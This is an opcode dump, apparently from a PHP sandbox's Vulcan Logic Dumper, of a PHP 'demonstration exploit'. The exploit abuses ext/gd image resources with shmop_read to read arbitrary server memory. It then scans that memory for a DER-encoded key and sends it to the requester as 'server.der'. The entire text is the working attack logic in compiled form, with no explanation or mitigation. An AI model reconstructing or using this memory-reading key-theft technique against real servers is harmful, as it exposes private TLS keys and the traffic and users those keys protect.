Finding entry points Branch analysis from position: 0 2 jumps found. (Code = 47) Position 1 = 5, Position 2 = 10 Branch analysis from position: 5 2 jumps found. (Code = 43) Position 1 = 11, Position 2 = 12 Branch analysis from position: 11 1 jumps found. (Code = 79) Position 1 = -2 Branch analysis from position: 12 1 jumps found. (Code = 42) Position 1 = 67 Branch analysis from position: 67 2 jumps found. (Code = 44) Position 1 = 68, Position 2 = 16 Branch analysis from position: 68 1 jumps found. (Code = 62) Position 1 = -2 Branch analysis from position: 16 2 jumps found. (Code = 46) Position 1 = 28, Position 2 = 30 Branch analysis from position: 28 2 jumps found. (Code = 43) Position 1 = 31, Position 2 = 66 Branch analysis from position: 31 2 jumps found. (Code = 43) Position 1 = 39, Position 2 = 66 Branch analysis from position: 39 2 jumps found. (Code = 43) Position 1 = 65, Position 2 = 66 Branch analysis from position: 65 1 jumps found. (Code = 42) Position 1 = 68 Branch analysis from position: 68 Branch analysis from position: 66 2 jumps found. (Code = 44) Position 1 = 68, Position 2 = 16 Branch analysis from position: 68 Branch analysis from position: 16 Branch analysis from position: 66 Branch analysis from position: 66 Branch analysis from position: 30 Branch analysis from position: 10 filename: /in/DTl4j function name: (null) number of ops: 76 compiled vars: !0 = $offset, !1 = $data, !2 = $position, !3 = $length, !4 = $keydata line #* E I O op fetch ext return operands ------------------------------------------------------------------------------------- 17 0 E > INIT_FCALL 'extension_loaded' 1 SEND_VAL 'gd' 2 DO_ICALL $5 3 BOOL_NOT ~6 $5 4 > JMPNZ_EX ~6 ~6, ->10 5 > INIT_FCALL 'extension_loaded' 6 SEND_VAL 'shmop' 7 DO_ICALL $7 8 BOOL_NOT ~8 $7 9 BOOL ~6 ~8 10 > > JMPZ ~6, ->12 18 11 > > EXIT 'This+demonstration+exploit+only+works+with+ext%2Fgd+and+ext%2Fshmop+loaded.' 40 12 > INIT_FCALL 'init' 13 DO_FCALL 0 42 14 ASSIGN !0, 134578176 44 15 > JMP ->67 46 16 > INIT_FCALL 'peek' 17 SEND_VAR !0 18 SEND_VAL 1040 19 DO_FCALL 0 $11 20 ASSIGN !1, $11 48 21 INIT_FCALL 'strpos' 22 SEND_VAR !1 23 SEND_VAL '0%82' 24 DO_ICALL $13 25 ASSIGN !2, $13 49 26 TYPE_CHECK 1018 ~15 !2 27 > JMPZ_EX ~15 ~15, ->30 28 > IS_SMALLER ~16 !2, 1024 29 BOOL ~15 ~16 30 > > JMPZ ~15, ->66 51 31 > INIT_FCALL 'substr' 32 SEND_VAR !1 33 ADD ~17 !2, 4 34 SEND_VAL ~17 35 SEND_VAL 4 36 DO_ICALL $18 37 IS_EQUAL $18, '%02%01%00%02' 38 > JMPZ ~19, ->66 52 39 > INIT_FCALL 'ord' 40 ADD ~20 !2, 2 41 FETCH_DIM_R ~21 !1, ~20 42 SEND_VAL ~21 43 DO_ICALL $22 44 MUL ~23 $22, 256 45 INIT_FCALL 'ord' 46 ADD ~24 !2, 3 47 FETCH_DIM_R ~25 !1, ~24 48 SEND_VAL ~25 49 DO_ICALL $26 50 ADD ~27 ~23, $26 51 ADD ~28 ~27, 4 52 ASSIGN !3, ~28 53 53 INIT_FCALL 'peek' 54 ADD ~30 !0, !2 55 SEND_VAL ~30 56 SEND_VAR !3 57 DO_FCALL 0 $31 58 ASSIGN !4, $31 55 59 INIT_FCALL 'strpos' 60 SEND_VAR !4 61 SEND_VAL '%01%00%01' 62 DO_ICALL $33 63 IS_SMALLER 0, $33 64 > JMPZ ~34, ->66 56 65 > > JMP ->68 59 66 > ASSIGN_OP 1 !0, 1024 44 67 > > JMPNZ 1, ->16 62 68 > INIT_FCALL 'header' 69 SEND_VAL 'Content-type%3A+application%2Foctet-stream' 70 DO_ICALL 63 71 INIT_FCALL 'header' 72 SEND_VAL 'Content-Disposition%3A+attachment%3B+filename%3D%22server.der%22' 73 DO_ICALL 64 74 ECHO !4 65 75 > RETURN 1 Function init: Finding entry points Branch analysis from position: 0 1 jumps found. (Code = 62) Position 1 = -2 filename: /in/DTl4j function name: init number of ops: 19 compiled vars: !0 = $rid line #* E I O op fetch ext return operands ------------------------------------------------------------------------------------- 23 0 E > BIND_GLOBAL !0, 'rid' 25 1 INIT_FCALL_BY_NAME 'imagecreate' 2 SEND_VAL_EX 10 3 SEND_VAL_EX 10 4 DO_FCALL 0 $1 5 ASSIGN !0, $1 26 6 INIT_FCALL_BY_NAME 'imagecolorallocate' 7 SEND_VAR_EX !0 8 SEND_VAL_EX 0 9 SEND_VAL_EX 0 10 SEND_VAL_EX 0 11 DO_FCALL 0 27 12 INIT_FCALL_BY_NAME 'imagecolorallocate' 13 SEND_VAR_EX !0 14 SEND_VAL_EX 0 15 SEND_VAL_EX 0 16 SEND_VAL_EX 0 17 DO_FCALL 0 28 18 > RETURN null End of function init Function peek: Finding entry points Branch analysis from position: 0 1 jumps found. (Code = 62) Position 1 = -2 filename: /in/DTl4j function name: peek number of ops: 31 compiled vars: !0 = $addr, !1 = $size, !2 = $rid line #* E I O op fetch ext return operands ------------------------------------------------------------------------------------- 30 0 E > RECV !0 1 RECV !1 32 2 BIND_GLOBAL !2, 'rid' 33 3 INIT_FCALL_BY_NAME 'imagecolordeallocate' 4 SEND_VAR_EX !2 5 SEND_VAL_EX 0 6 DO_FCALL 0 34 7 INIT_FCALL_BY_NAME 'imagecolordeallocate' 8 SEND_VAR_EX !2 9 SEND_VAL_EX 1 10 DO_FCALL 0 35 11 INIT_FCALL_BY_NAME 'imagecolorallocate' 12 SEND_VAR_EX !2 13 SEND_VAR_EX !0 14 SEND_VAL_EX 0 15 SEND_VAL_EX 0 16 DO_FCALL 0 36 17 INIT_FCALL_BY_NAME 'imagecolorallocate' 18 SEND_VAR_EX !2 19 SEND_VAR_EX !1 20 SEND_VAL_EX 0 21 SEND_VAL_EX 0 22 DO_FCALL 0 37 23 INIT_FCALL_BY_NAME 'shmop_read' 24 CAST 4 ~7 !2 25 SEND_VAL_EX ~7 26 SEND_VAL_EX 0 27 SEND_VAR_EX !1 28 DO_FCALL 0 $8 29 > RETURN $8 38 30* > RETURN null End of function peek
Generated using Vulcan Logic Dumper, using php 8.0.0